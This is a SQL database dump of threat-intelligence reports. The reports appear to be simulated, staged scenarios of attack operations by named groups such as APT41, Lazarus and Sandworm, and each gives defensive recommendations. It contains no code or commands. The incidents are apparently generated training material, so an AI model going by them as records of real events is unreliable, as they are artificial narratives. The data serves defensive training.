(184, 36, 471, 1, 'Unsigned Software Update Detected', '## Overview\nFollowing the detection of suspicious Wi-Fi network activity, a potential threat has been identified involving an unsigned software update. This update appears to be disguised as a legitimate system or application update targeting luxury hotel executives.\n\n## Details\n- **Type of Threat:** Tapaoux malware\n- **Method of Delivery:** Wi-Fi network masquerading as a trusted access point\n- **Target:** Executives of luxury hotels\n\n## Recommendations\n- **Network Monitoring:** Enhance monitoring of Wi-Fi networks for unauthorized access points.\n- **Software Verification:** Ensure all updates are signed and verified before installation.\n\n## Next Steps\nInvestigate the execution phase to determine if the malware has been successfully deployed onto target systems.', '2026-01-05 03:04:49'),
(185, 36, 472, 2, 'Tapaoux Malware Persistence Mechanism', '## Overview\nAfter identifying the unsigned software update, further investigation reveals the Tapaoux malware has established persistence mechanisms in the target systems.\n\n## Details\n- **Persistence Techniques:** The malware modifies startup scripts and registry keys to ensure it executes upon system reboot.\n- **Stealth Tactics:** It employs obfuscation techniques to evade detection by traditional antivirus solutions.\n\n## Recommendations\n- **System Hardening:** Regularly review and limit startup scripts and registry changes.\n- **Advanced Threat Protection:** Deploy solutions capable of detecting obfuscated code.\n\n## Next Steps\nExamine potential unauthorized credential access attempts as the malware may be moving laterally within the network.', '2026-01-05 03:04:49'),
(186, 36, 473, 3, 'Unauthorized Credential Access Attempt', '## Overview\nFollowing the establishment of persistence by Tapaoux malware, there have been attempts to access credentials within the compromised systems.\n\n## Details\n- **Credential Harvesting:** The malware attempts to extract cached credentials from browsers and network authentication processes.\n- **Potential Targets:** Emails, financial applications, and internal corporate networks.\n\n## Recommendations\n- **Credential Management:** Enforce multi-factor authentication and regular credential updates.\n- **Incident Response:** Conduct a thorough review of access logs to identify any anomalies.\n\n## Next Steps\nMonitor for potential exfiltration of sensitive data, which could indicate further stages of the attack.', '2026-01-05 03:04:49'),
(187, 36, 474, 4, 'Exfiltration of Sensitive Data', '## Overview\nAs anticipated, there is evidence of data exfiltration following the unauthorized credential access attempts. Sensitive information has been transferred out of the network.\n\n## Details\n- **Data Types:** Financial records, personal information of executives, and proprietary business data.\n- **Exfiltration Channels:** Utilization of encrypted channels and cloud services to circumvent detection.\n\n## Recommendations\n- **Data Loss Prevention:** Implement solutions to monitor and block unauthorized data transfers.\n- **Forensic Analysis:** Conduct a comprehensive forensic analysis to understand the scale and impact of the data breach.\n\n## Next Steps\nInitiate containment procedures to prevent further data loss and begin remediation efforts to secure the network.', '2026-01-05 03:04:49'),
(188, 36, 475, 5, NULL, NULL, '2026-01-05 03:04:49'),
(189, 37, 476, 1, 'Analysis of Malicious Payload Execution via RoyalRoad Exploit', '### Overview\nFollowing the detection of a suspicious email containing a malicious RTF attachment, further investigation reveals the exploitation of the RoyalRoad vulnerability. The RoyalRoad exploit has been utilized to execute a malicious payload on the target system.\n\n### Technical Details\n- **Exploit Method**: The RTF attachment leverages a known vulnerability in Microsoft Office to execute arbitrary code.\n- **Payload**: The payload includes scripts that prepare the environment for further exploitation.\n\n### Implications\nThe successful execution of this payload indicates a sophisticated attack vector likely aiming to establish deeper system access.\n\n### Next Steps\n- Monitor for any signs of persistence mechanisms being established.\n- Conduct a detailed forensic analysis of the affected systems.', '2026-01-05 03:08:29'),
(190, 37, 477, 2, 'Persistence Mechanism via Aria-body Backdoor', '### Overview\nFollowing the execution of the RoyalRoad exploit, analysis identifies the installation of the Aria-body backdoor. This backdoor is designed to maintain persistent access to the compromised systems.\n\n### Technical Details\n- **Backdoor Functionality**: The Aria-body backdoor allows the attacker to maintain a foothold in the network and execute commands remotely.\n- **Persistence Method**: The backdoor is embedded within legitimate system processes, making detection challenging.\n\n### Implications\nEstablishing persistence is a critical step for the attacker to facilitate further actions, including lateral movement.\n\n### Recommendations\n- Implement enhanced monitoring for unusual network activities.\n- Initiate a comprehensive review of system logs to identify any signs of lateral movement.', '2026-01-05 03:08:29'),
(191, 37, 478, 3, 'Lateral Movement Analysis Across Internal Network', '### Overview\nInvestigation into the Aria-body backdoor has unveiled signs of lateral movement within the internal network. The attacker appears to be exploring the network to identify valuable targets.\n\n### Technical Details\n- **Movement Techniques**: The attacker utilizes legitimate credentials and tools to access other systems within the network.\n- **Targets Identified**: Several high-value systems have been accessed, indicating a targeted approach.\n\n### Implications\nThe lateral movement poses a significant risk as it suggests the attacker is positioning themselves for data exfiltration.\n\n### Countermeasures\n- Conduct a thorough audit of user accounts and permissions.\n- Isolate affected systems to prevent further unauthorized access.', '2026-01-05 03:08:29'),
(192, 37, 479, 4, 'Data Exfiltration to Command and Control Server', '### Overview\nSubsequent to the lateral movement activities, evidence of data exfiltration has been detected. Data is being transmitted to an external Command and Control (C2) server.\n\n### Technical Details\n- **Exfiltration Method**: The data is being exfiltrated over encrypted channels to evade detection.\n- **Type of Data**: Preliminary analysis suggests sensitive organizational data is being targeted.\n\n### Implications\nData exfiltration represents a critical breach of security and potential disclosure of sensitive information.\n\n### Immediate Actions\n- Block known C2 server IPs and domains.\n- Initiate an incident response protocol to contain and mitigate the breach.\n- Notify relevant stakeholders and begin a post-incident analysis to prevent future occurrences.', '2026-01-05 03:08:29'),
(193, 37, 480, 5, NULL, NULL, '2026-01-05 03:08:29'),
(194, 39, 481, 1, 'Unauthorized CMS Article Publication: Initial Access and Indicators', '### Overview\nUpon detecting a suspicious login, further analysis revealed unauthorized activity within the CMS. This activity is characterized by the creation and publication of articles containing misleading information.\n\n### Details\n- **Entry Point**: Exploitation of CMS vulnerabilities allowing remote access.\n- **Indicators of Compromise (IoCs)**: Abnormal login times, unfamiliar IP addresses, and modifications to content templates.\n\n### Recommendations\n- Immediate review and audit of CMS access logs.\n- Implementation of multi-factor authentication for CMS access.\n- Increase monitoring of content changes and publication activities.', '2026-01-05 03:22:52'),
(195, 39, 482, 2, 'Backdoor Account Creation: Ensuring Persistence', '### Overview\nFollowing the unauthorized publication of articles, further investigation uncovered the creation of backdoor accounts within the CMS to maintain persistent access.\n\n### Details\n- **Objective**: Establish long-term access to manipulate media content.\n- **Method**: Accounts created using compromised credentials or exploiting CMS administrative functions.\n\n### Indicators\n- New accounts with administrative privileges created without authorization.\n- Unusual account activity patterns.\n\n### Recommendations\n- Conduct a thorough review of all CMS accounts and privileges.\n- Enforce stricter user access controls and regular audits.', '2026-01-05 03:22:52'),
(196, 39, 483, 3, 'Social Media Amplification Detected: Expanding Influence', '### Overview\nWith the establishment of persistence via backdoor accounts, the operation has moved to social media platforms to amplify misinformation.\n\n### Details\n- **Tactics**: Use of bot networks and sockpuppet accounts to spread content.\n- **Platforms Targeted**: Prominent social media platforms where misinformation can quickly gain traction.\n\n### Indicators\n- Spike in social media activity related to the published misinformation.\n- Rapid increase in shares and likes from newly created or suspicious accounts.\n\n### Recommendations\n- Collaborate with social media platforms to identify and suspend malicious accounts.\n- Deploy AI-based tools to detect and mitigate bot-driven amplification.', '2026-01-05 03:22:52'),
(197, 39, 484, 4, 'Data Exfiltration Attempt Detected: Protecting Sensitive Information', '### Overview\nFollowing the amplification of misinformation, attempts have been made to exfiltrate sensitive data, potentially to leverage for further influence operations or blackmail.\n\n### Details\n- **Objective**: Extract sensitive data from compromised systems.\n- **Methods**: Use of encrypted channels and covert data transfer techniques.\n\n### Indicators\n- Unusual outbound data traffic patterns detected.\n- Use of unapproved encryption tools and protocols.\n\n### Recommendations\n- Immediate lockdown of affected systems to prevent further data loss.\n- Conduct a comprehensive forensic analysis to understand the scope of the breach.\n- Enhance data loss prevention mechanisms and user training on data security.', '2026-01-05 03:22:52'),
(198, 39, 485, 5, NULL, NULL, '2026-01-05 03:22:52'),
(199, 40, 486, 1, 'Compromised Supplier Network: Initial Access Analysis', '### Background\n\nFollowing the initial alert of a **Supply Chain Compromise**, intelligence indicates that APT41 has infiltrated a key supplier network within the gaming industry. This breach was achieved through the exploitation of a vulnerable third-party software component.\n\n### Implications\n\n- **Potential Threat**: The compromised supplier can act as a distribution point for malicious payloads like ShadowPad.\n- **Scope of Access**: Initial entry points can provide adversaries with broad access to the target\'s supply chain, making subsequent attacks more stealthy and impactful.\n\n### Recommendations\n\n- **Immediate Action**: Initiate a full review of all supplier network access points and enhance monitoring for abnormal activity.\n- **Preventive Measures**: Strengthen supplier security standards and conduct regular security audits.', '2026-01-05 03:26:48'),
(200, 40, 487, 2, 'Code Injection Detection in Build Environment', '### Overview\n\nFollowing the **Code Injection** alert, it has been detected that APT41 executed malicious code within the build environment of a key gaming application.\n\n### Details of the Attack\n\n- **Vector**: The adversary leveraged the compromised supplier credentials to inject malicious scripts into the build server.\n- **Target**: This code aims to facilitate the deployment of ShadowPad, enabling further infiltration.\n\n### Impact\n\n- **Integrity Risk**: Code integrity is compromised, potentially affecting all downstream applications.\n- **Propagation**: The injected code can propagate malicious payloads to end-user devices.\n\n### Mitigation Steps\n\n- **Immediate Scrutiny**: Conduct a thorough audit of the build environment for unauthorized changes.\n- **Verification**: Validate integrity of application updates before deployment.', '2026-01-05 03:26:48'),
(201, 40, 488, 3, 'ShadowPad Backdoor Installation and Persistence', '### Situation Update\n\nPost the execution phase, APT41 has successfully established persistence through the installation of the **ShadowPad backdoor**.\n\n### Mechanism of Persistence\n\n- **Backdoor Features**: ShadowPad is known for its modular architecture, allowing dynamic loading of plugins for various malicious functions.\n- **Stealth Techniques**: Utilizes encrypted communication and masquerades as legitimate software processes.\n\n### Strategic Implications\n\n- **Long-Term Access**: Persistent access enables ongoing espionage and potential sabotage.\n- **Network Vulnerability**: Ongoing risk of lateral movement within the network.\n\n### Defensive Measures\n\n- **Enhanced Monitoring**: Deploy behavioral analytics to detect abnormal patterns indicative of backdoor activity.\n- **System Hardening**: Apply security patches and restrict administrative privileges.', '2026-01-05 03:26:48'),
(202, 40, 489, 4, 'Credential Dumping and Lateral Movement', '### Current Threat Landscape\n\nAs the operation progresses, APT41 has initiated **Lateral Movement** across the player networks by exploiting dumped credentials.\n\n### Attack Dynamics\n\n- **Credential Access**: Utilizing stolen credentials, adversaries gain access to additional systems within the network.\n- **Movement Strategy**: Focused on reaching high-value targets and exfiltrating sensitive data.\n\n### Consequences\n\n- **Increased Exposure**: Compromised credentials lead to expanded access and control over network resources.\n- **Data Breach Risk**: Heightened risk of sensitive player data being accessed and exfiltrated.\n\n### Countermeasures\n\n- **Credential Hygiene**: Enforce password complexity and regular changes.\n- **Access Controls**: Implement multi-factor authentication and continuous monitoring of user activities.', '2026-01-05 03:26:48'),
(203, 40, 490, 5, NULL, NULL, '2026-01-05 03:26:48'),
(204, 41, 491, 1, 'Follow-up on Suspicious Email Attachment', '## Overview\nUpon detection of a suspicious email attachment, further analysis revealed that the email originated from a compromised server known to be associated with the Lazarus Group. This server previously engaged in spear-phishing campaigns targeting defense contractors.\n\n## Key Findings\n- **Sender Information**: The email appeared to be sent from a legitimate contact within the organization, suggesting email spoofing techniques were employed.\n- **Attachment Details**: The attachment was a macro-enabled Excel document designed to execute a malicious payload upon opening.\n\n## Recommendations\n- **Immediate Action**: Instruct recipients to delete the email without opening the attachment.\n- **Preventive Measures**: Enhance email gateway security to filter out similar threats.', '2026-01-05 04:01:18'),
(205, 41, 492, 2, 'DTrack Payload Execution Analysis', '## Overview\nThe execution of the DTrack malware payload marks a significant escalation in the attack, indicating a shift from reconnaissance to active exploitation.\n\n## Key Findings\n- **Payload Behavior**: DTrack is known for its ability to perform file operations, execute commands, and communicate with command and control (C2) servers.\n- **C2 Communication**: Encrypted traffic was detected heading to known Lazarus Group-controlled IP addresses.\n\n## Recommendations\n- **Immediate Action**: Quarantine affected systems to prevent further spread.\n- **Forensic Analysis**: Conduct a detailed forensic analysis of infected machines to understand the extent of compromise.', '2026-01-05 04:01:18'),
(206, 41, 493, 3, 'Persistence Mechanism - DLL Hijacking', '## Overview\nThe attackers are leveraging DLL hijacking to maintain persistence on compromised systems, a technique commonly used by the Lazarus Group to ensure their presence remains undetected.\n\n## Key Findings\n- **DLL Injection**: Malicious DLLs are injected into commonly used applications, allowing them to execute under the guise of legitimate processes.\n- **Registry Modifications**: Changes in registry keys have been detected, redirecting legitimate application paths to malicious DLLs.\n\n## Recommendations\n- **Immediate Action**: Review and restore altered registry keys to their original state.\n- **Monitoring**: Implement enhanced monitoring of DLL loads across critical systems.', '2026-01-05 04:01:18'),
(207, 41, 494, 4, 'Lateral Movement via Pass-the-Hash', '## Overview\nThe attack has progressed to lateral movement within the network using Pass-the-Hash techniques, indicating a high level of sophistication and access.\n\n## Key Findings\n- **Credential Abuse**: Compromised credentials were used to authenticate across multiple systems without the need for password cracking.\n- **Targeted Systems**: High-value targets such as servers containing sensitive defense schematics have been identified as primary targets.\n\n## Recommendations\n- **Immediate Action**: Invalidate all compromised credentials and enforce password resets.\n- **Network Segmentation**: Implement network segmentation to limit lateral movement capabilities.', '2026-01-05 04:01:18'),
(208, 41, 495, 5, NULL, NULL, '2026-01-05 04:01:18'),
(209, 42, 496, 1, 'Analysis of Initial Access via Suspicious Domain', '### Context\nFollowing the detection of suspicious domain access, further investigation reveals that the domains in question are linked to a known CopyKittens infrastructure. These domains have been associated with phishing campaigns targeting government entities.\n\n### Findings\n- **Domain Characteristics**: The domains exhibit patterns typical of CopyKittens, such as misspelled names of legitimate organizations.\n- **Vector Analysis**: Initial access is likely achieved through spear-phishing emails containing malicious links or attachments.\n\n### Recommendations\n- Implement enhanced email filtering rules to detect and block phishing attempts.\n- Conduct employee training on recognizing phishing emails.', '2026-01-05 04:03:11'),
(210, 42, 497, 2, 'Matryoshka RAT Execution and Behavioral Indicators', '### Context\nAfter the execution of the Matryoshka RAT, telemetry data indicates the deployment of the RAT on compromised systems.\n\n### Findings\n- **Execution Patterns**: The RAT is executed using script-based loaders, often leveraging PowerShell or JavaScript.\n- **Persistence Mechanisms**: Scheduled tasks and registry modifications have been identified as methods to ensure persistence.\n\n### Recommendations\n- Conduct system-wide scans for registry anomalies and unauthorized scheduled tasks.\n- Implement application whitelisting to prevent the execution of unauthorized scripts.', '2026-01-05 04:03:13'),
(211, 42, 498, 3, 'DNS Tunneling Activity and Persistence Tactics', '### Context\nThe identification of DNS tunneling activity signifies an attempt by the attackers to maintain a covert communication channel with the compromised systems.\n\n### Findings\n- **Tunneling Details**: Encoded DNS queries and responses are used to bypass traditional network monitoring.\n- **Infrastructure**: Analysis shows multiple subdomains dynamically resolving to various IP addresses, indicating a sophisticated command and control (C2) setup.\n\n### Recommendations\n- Deploy DNS monitoring solutions to identify and block tunneling activities.\n- Implement strict outbound DNS policies to prevent unauthorized queries.', '2026-01-05 04:03:13'),
(212, 42, 499, 4, 'Lateral Movement Indicators and Network Traffic Analysis', '### Context\nUnusual network traffic patterns suggest lateral movement within the network as attackers attempt to access sensitive systems.\n\n### Findings\n- **Traffic Anomalies**: High-volume data transfers and unusual port activity have been observed.\n- **Compromised Credentials**: Evidence suggests the use of harvested credentials to access additional systems.\n\n### Recommendations\n- Enhance network segmentation to limit lateral movement potential.\n- Conduct a thorough audit of user accounts and implement multi-factor authentication (MFA).', '2026-01-05 04:03:13'),
(213, 42, 500, 5, NULL, NULL, '2026-01-05 04:03:13'),
(214, 43, 501, 1, 'Profile Analysis of Unverified Facebook Account', '### Overview\nThe suspicious Facebook profile involved in the initial alert appears to have been created recently, lacking personal details and typical user activity. This is indicative of a potential fake persona used for social engineering.\n\n### Details\n- **Profile Name:** John Doe\n- **Creation Date:** 2 weeks ago\n- **Mutual Connections:** 0\n- **Activity:** Minimal posts, all generic\n\n### Analysis\nThis profile likely serves as a vector for social engineering, aimed at establishing trust with targets within aerospace firms. Recommend monitoring for further interactions and cross-referencing with other suspicious profiles.', '2026-01-06 01:24:23'),
(215, 43, 502, 2, 'Phishing Attempt via Direct Message', '### Overview\nA phishing attempt was identified following the interaction with the suspicious Facebook profile. An employee received a direct message containing a malicious link, masquerading as an industry-related article.\n\n### Details\n- **Sender:** Unverified Facebook Profile\n- **Message Content:** \'Check out this article on latest aerospace innovations\' with a shortened link.\n- **Intended Target:** Senior Engineer in R&D\n\n### Recommendations\n- **Immediate Action:** Block sender and delete message.\n- **Awareness Training:** Reinforce phishing awareness among staff, emphasizing caution with unsolicited messages.', '2026-01-06 01:24:23'),
(216, 43, 503, 3, 'Detection of \'Gholee\' Malware Execution', '### Overview\nThe execution of the \'Gholee\' malware was detected on a compromised system within the aerospace firm\'s network. The malware was likely deployed following the successful phishing attempt.\n\n### Details\n- **Affected System:** Workstation of Senior Engineer\n- **Malware Characteristics:** Known for data harvesting and creating backdoors\n- **Detection Method:** Anomaly detection via endpoint security solution\n\n### Recommendations\n- **Containment:** Isolate affected systems immediately.\n- **Forensic Analysis:** Conduct a detailed analysis to understand entry points and potential data affected.', '2026-01-06 01:24:23'),
(217, 43, 504, 4, 'Persistence Mechanisms Established by \'Gholee\'', '### Overview\nFurther analysis revealed that \'Gholee\' malware has established persistence mechanisms, ensuring its survival through system reboots and security updates.\n\n### Details\n- **Persistence Techniques:** \n  - Registry key modifications\n  - Scheduled tasks creation\n  - DLL injection into legitimate processes\n\n### Countermeasures\n- **Immediate Actions:** Remove persistence mechanisms by restoring registry keys and disabling scheduled tasks.\n- **Monitoring:** Enhance system logging to detect future persistence attempts.', '2026-01-06 01:24:23'),
(218, 43, 505, 5, 'Lateral Movement Across Network', '### Overview\nFollowing the establishment of persistence, lateral movement was detected across the network, likely aimed at accessing sensitive data and escalating privileges.\n\n### Details\n- **Techniques Used:**\n  - Pass-the-Hash\n  - Remote Desktop Protocol exploitation\n- **Affected Systems:** Multiple workstations and servers in the R&D department\n\n### Recommendations\n- **Network Segmentation:** Implement stricter segmentation to limit lateral movement.\n- **Credential Management:** Enforce strong, unique passwords and regular changes.\n- **Incident Response:** Conduct a full network sweep to identify and neutralize further threats.', '2026-01-06 01:24:23'),
(219, 43, 506, 6, NULL, NULL, '2026-01-06 01:24:23'),
(220, 44, 507, 1, 'Analysis of Malicious Code Execution', '## Context\nAfter the initial breach detected via EternalBlue, the adversary has executed malicious code on the compromised system. This report delves into the observed remote code execution (RCE) activities.\n\n## Findings\n- **Payload Analyzed**: The executed payload is identified as a variant of the WannaCry ransomware, designed to encrypt files on the infected machines.\n- **Execution Method**: The payload is executed using the exploitation of the SMBv1 vulnerability, allowing for unauthenticated remote code execution.\n- **Immediate Actions**: Mitigation strategies should include disabling SMBv1 and ensuring robust network segmentation to limit the damage of any further RCE attempts.', '2026-01-06 01:34:24'),
(221, 44, 508, 2, 'Persistence Mechanisms in Place', '## Overview\nFollowing the execution of malicious code, the ransomware has established persistence to survive system reboots and maintain control over the infected systems.\n\n## Details\n- **Techniques Used**: The ransomware modifies registry keys and schedules tasks to trigger on startup, ensuring its presence on the system.\n- **Potential Countermeasures**: Immediate actions include reviewing and cleaning registry keys and scheduled tasks, and implementing endpoint detection and response (EDR) solutions to monitor for persistence attempts.', '2026-01-06 01:34:24'),
(222, 44, 509, 3, 'SMB Propagation Analysis', '## Introduction\nThe ransomware is now actively propagating through the network using SMB protocol vulnerabilities. This report outlines the observed lateral movement patterns.\n\n## Observations\n- **Propagation Method**: Utilizes the EternalBlue exploit to spread to other vulnerable machines within the network.\n- **Network Mapping**: The ransomware scans the network for other vulnerable hosts, exponentially increasing its reach.\n- **Recommendations**: Immediate patching of all systems against SMBv1 vulnerabilities and isolation of affected subnets are critical to contain the spread.', '2026-01-06 01:34:24'),
(223, 44, 510, 4, 'Kill-Switch Domain Investigation', '## Summary\nA potential kill-switch domain has been identified, which could deactivate the ransomware if successfully queried.\n\n## Investigation\n- **Domain Analysis**: The domain has been hardcoded into the malware as a potential stop mechanism.\n- **Actionable Steps**: Conduct DNS sinkholing experiments to assess the feasibility of activating the kill-switch. Consider collaborating with global ISPs for widespread DNS monitoring.', '2026-01-06 01:34:24'),
(224, 44, 511, 5, 'Encryption Logic Breakdown', '## Overview\nThe ransomware has begun encrypting files on compromised systems. This report provides an analysis of its encryption logic.\n\n## Technical Details\n- **Encryption Algorithm**: Utilizes a combination of RSA and AES to encrypt files, ensuring robustness and difficulty in decryption without the private key.\n- **File Types Targeted**: Focuses on commonly used document and multimedia file formats.\n- **Countermeasures**: Regular backups and data recovery plans are essential. Evaluate the feasibility of deploying decryption tools if available.', '2026-01-06 01:34:24'),
(225, 44, 512, 6, 'Data Exfiltration Attempt Analysis', '## Context\nAs the ransomware encrypts data, it is also attempting to exfiltrate sensitive information from the compromised systems.\n\n## Key Insights\n- **Exfiltration Channels**: Observed usage of non-standard ports and encrypted protocols for data exfiltration attempts.\n- **Data Types at Risk**: Includes personally identifiable information (PII) and corporate intellectual property.\n- **Defense Strategies**: Immediate network traffic analysis and blocking suspicious outbound connections can mitigate data loss. Implement data loss prevention (DLP) solutions to monitor sensitive data movement.', '2026-01-06 01:34:24'),
(226, 44, 513, 7, 'Ransom Note Deployment and Impact', '## Summary\nThe deployment of ransom notes signifies the completion of the ransomware\'s encryption cycle and the demand for payment.\n\n## Insights\n- **Demand Details**: The ransom note typically demands payment in cryptocurrency, providing instructions for victims.\n- **Psychological Impact**: The presence of the ransom note induces urgency and panic, often leading to hasty decision-making.\n- **Recommendations**: Encourage organizations to have a clear incident response plan and avoid paying the ransom. Leverage law enforcement and cybersecurity partnerships for support.', '2026-01-06 01:34:24'),
(227, 44, 514, 8, NULL, NULL, '2026-01-06 01:34:24'),
(228, 45, 515, 1, 'In-Depth Analysis of Supply Chain Compromise', '### Overview\nThe initial alert indicates a compromised software update, typical of a supply chain attack. This technique is often employed to distribute malicious payloads widely and stealthily.\n\n### Key Findings\n- **Vendor Involvement**: The compromised update originated from a trusted vendor, indicating possible unauthorized access to their infrastructure.\n- **Distribution Scope**: Initial analysis suggests a widespread distribution affecting multiple sectors.\n\n### Recommendations\n- **Immediate Patch Review**: Verify the integrity of all recent updates and patches from associated vendors.\n- **Network Segmentation**: Implement network segmentation to contain any potential spread of malicious activity.\n\n### Next Steps\nWe anticipate potential destructive activities following the introduction of malicious components. Monitor for unusual disk activity, which may indicate MBR overwriting.', '2026-01-06 01:37:06'),
(229, 45, 516, 2, 'MBR Overwriting Detected: Sandworm\'s Signature', '### Overview\nFollowing the compromised software update, we have observed Master Boot Record (MBR) overwriting activity. This is a destructive action characteristic of Sandworm\'s tactics.\n\n### Key Indicators\n- **MBR Modification**: Unauthorized changes to the MBR have been logged, leading to potential system boot failures.\n- **System Recovery**: Attempts to recover the MBR have been partially successful, but full restoration is uncertain.\n\n### Recommendations\n- **Immediate System Backups**: Ensure that all critical data is backed up and secure.\n- **Forensic Analysis**: Engage forensic teams to analyze the altered MBR and identify further threats.\n\n### Next Steps\nGiven past Sandworm operations, expect potential credential harvesting as the next phase of the attack. Monitor for suspicious credential access activities.', '2026-01-06 01:37:06'),
(230, 45, 517, 3, 'Credential Harvesting via Mimikatz: A Deeper Threat', '### Overview\nCredential harvesting has been detected utilizing Mimikatz, a known tool for extracting account credentials from compromised systems.\n\n### Key Indicators\n- **Unauthorized Access Attempts**: Multiple failed and successful login attempts from unusual locations.\n- **Privileged Account Targeting**: Specific focus on accounts with elevated privileges.\n\n### Recommendations\n- **Account Lockdowns**: Immediately lockdown and reset passwords for compromised accounts.\n- **Multi-Factor Authentication**: Implement MFA to secure access to critical systems.\n\n### Next Steps\nPrepare for potential lateral movement within the network as the attacker leverages harvested credentials to propagate. Enhance monitoring for unusual internal network activity.', '2026-01-06 01:37:06'),
(231, 45, 518, 4, 'Lateral Movement and Data Exfiltration: Identifying the Attack Progression', '### Overview\nRapid lateral movement within the network has been identified, coupled with attempts to exfiltrate data.\n\n### Key Indicators\n- **Unusual Traffic Patterns**: High volumes of data transfers to external IPs not previously associated with the organization.\n- **Network Scanning**: Evidence of network scanning activities to identify further targets.\n\n### Recommendations\n- **Network Isolation**: Isolate affected segments to prevent further spread.\n- **Data Loss Prevention**: Strengthen DLP solutions to monitor and block unauthorized data transfers.\n\n### Conclusion\nThe operation has reached a critical stage with the potential for significant data loss. Immediate containment and remediation efforts are essential to minimize impact.', '2026-01-06 01:37:06'),
(232, 45, 519, 5, NULL, NULL, '2026-01-06 01:37:06'),
(233, 46, 520, 1, 'Investigation into Suspicious Network Traffic', '### Summary\nFollowing the detection of suspicious network traffic linked to a potential drive-by download, our team has initiated a comprehensive analysis to identify the source and nature of the traffic.\n\n### Findings\n- **Traffic Source**: The suspicious traffic originated from IP addresses associated with compromised websites known to distribute fake Adobe Flash updates.\n- **Payload Analysis**: Initial investigations suggest the payload is part of a phishing campaign aimed at delivering ransomware.\n\n### Next Steps\nContinue monitoring for further network anomalies and prepare for potential execution of malicious software as indicated by the observed traffic patterns.', '2026-01-06 01:39:37'),
(234, 46, 521, 2, 'Analysis of Unverified Flash Update Execution', '### Summary\nAn unverified Adobe Flash update has been executed on several endpoints. This execution is suspected to be part of the Callisto Group\'s ransomware campaign.\n\n### Findings\n- **Execution Method**: The update bypassed standard security checks, indicating sophisticated evasion techniques.\n- **Code Review**: Preliminary code analysis shows similarities with known ransomware families, suggesting the dropper is used to deploy DiskCryptor.\n\n### Next Steps\nConduct a detailed reverse engineering of the executed file to confirm its capabilities and potential payloads. Prepare defenses against ransomware activation.', '2026-01-06 01:39:37'),
(235, 46, 522, 3, 'DiskCryptor Ransomware Persistence Strategy', '### Summary\nDiskCryptor ransomware has been detected, indicating the persistence phase of the attack.\n\n### Findings\n- **Ransomware Behavior**: The ransomware has encrypted local drives and is configured to activate upon system reboot.\n- **Persistence Mechanism**: Utilizes bootloader modification to ensure ransomware executes at system startup.\n\n### Next Steps\nIsolate infected systems to prevent further spread. Begin decryption efforts and analyze the persistence mechanisms to develop countermeasures.', '2026-01-06 01:39:37'),
(236, 46, 523, 4, 'Investigation into Unauthorized SMB Traffic', '### Summary\nUnauthorized SMB traffic has been observed, suggesting lateral movement within the network.\n\n### Findings\n- **Propagation Method**: Ransomware is leveraging SMB protocol to spread across network shares.\n- **Targeted Systems**: Systems with outdated SMB configurations are particularly vulnerable.\n\n### Next Steps\nImplement network segmentation to contain the spread. Initiate internal audits to identify and patch vulnerable systems. Prepare for potential data exfiltration attempts.', '2026-01-06 01:39:37'),
(237, 46, 524, 5, NULL, NULL, '2026-01-06 01:39:37'),
(238, 47, 525, 1, 'Unauthorized Network Access: Initial Analysis', '### Overview\nThe initial breach was detected at 03:45 UTC, involving unauthorized access to the network managing the Olympic ceremony systems. Our analysis indicates the use of stolen credentials to bypass security protocols.\n\n### Details\n- **Entry Point**: Compromised VPN credentials likely obtained through phishing.\n- **Affected Systems**: Early identification shows infiltration in user authentication servers.\n\n### Next Steps\nInvestigation will focus on identifying the origin of the breach and monitoring for any further unauthorized activities. Anticipate potential execution of malicious scripts as attackers establish foothold.', '2026-01-06 01:44:46');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(239, 47, 526, 2, 'Malicious Script Execution: Compromise Analysis', '### Overview\nFollowing the initial breach, malicious scripts were executed on ceremony systems, indicating an escalation in the attack. These scripts aim to disrupt key functionalities during the event.\n\n### Details\n- **Execution Method**: Scripts were deployed via PowerShell to modify system configurations.\n- **Impact**: Disruption in media streaming services and live event broadcasting.\n\n### Insights\nThe attackers are utilizing tools consistent with known Sandworm TTPs, suggesting a sophisticated operation. Next, we will analyze for signs of persistence mechanisms being established.', '2026-01-06 01:44:46'),
(240, 47, 527, 3, 'Persistence Mechanisms: Backdoor Installation', '### Overview\nThe attackers have installed multiple backdoors to ensure continued access and control over the compromised systems.\n\n### Details\n- **Backdoor Types**: Custom RATs detected, allowing remote command execution.\n- **Installation Method**: Leveraged administrative privileges obtained from initial breach.\n\n### Next Steps\nWith persistence achieved, the threat actors are expected to attempt lateral movement to spread through critical infrastructure. Monitoring lateral traffic and securing adjacent systems is crucial.', '2026-01-06 01:44:46'),
(241, 47, 528, 4, 'Lateral Movement: Internal Threat Expansion', '### Overview\nThe attackers are actively moving laterally within the network, targeting critical systems essential for ceremony operations.\n\n### Details\n- **Techniques Used**: SMB protocol exploitation and credential dumping observed.\n- **Targets**: Focus on database servers and event coordination systems.\n\n### Insights\nTheir movement patterns suggest a high level of network knowledge, potentially indicating insider collaboration. The next phase may involve data exfiltration, aiming at sensitive information related to event operations and personnel.', '2026-01-06 01:44:46'),
(242, 47, 529, 5, NULL, NULL, '2026-01-06 01:44:46'),
(243, 48, 530, 1, NULL, NULL, '2026-01-06 02:36:36'),
(244, 48, 531, 2, 'Malicious Payload Deployment Analysis', '## Malicious Payload Deployment Analysis\n\n**Overview:**\nFollowing the initial access via the ASUS Update Utility compromise, threat actors have successfully deployed a malicious payload across affected systems. This payload is designed to execute upon installation of the compromised update.\n\n**Key Findings:**\n- The payload targets systems immediately after the ASUS Live Update installation.\n- Analysis indicates the payload includes a dropper that installs additional malware components.\n- The dropper executes with administrative privileges, allowing it to bypass user account controls.\n\n**Recommendations:**\n- Conduct a thorough scan of all systems for known indicators of compromise.\n- Employ behavioral analysis to detect unusual process execution linked to the update utility.\n\n**Next Steps:**\nFocus on understanding the persistence mechanisms established post-payload execution to maintain threat actor presence.', '2026-01-06 02:36:36'),
(245, 48, 532, 3, 'Backdoor Access and Persistence', '## Backdoor Access and Persistence\n\n**Overview:**\nPost-execution, the threat actors have established backdoor access, ensuring persistent presence on compromised systems. This allows them to maintain control and facilitate further exploitation.\n\n**Key Findings:**\n- A new service is created to run at startup, linked to the malicious payload.\n- Registry modifications detected to ensure backdoor persistence.\n- Backdoor communications are encrypted, complicating detection efforts.\n\n**Recommendations:**\n- Monitor for creation of unauthorized services and registry changes.\n- Implement endpoint detection and response (EDR) solutions to track anomalous behaviors.\n\n**Next Steps:**\nInvestigate potential lateral movement patterns and credentials that may have been compromised.', '2026-01-06 02:36:36'),
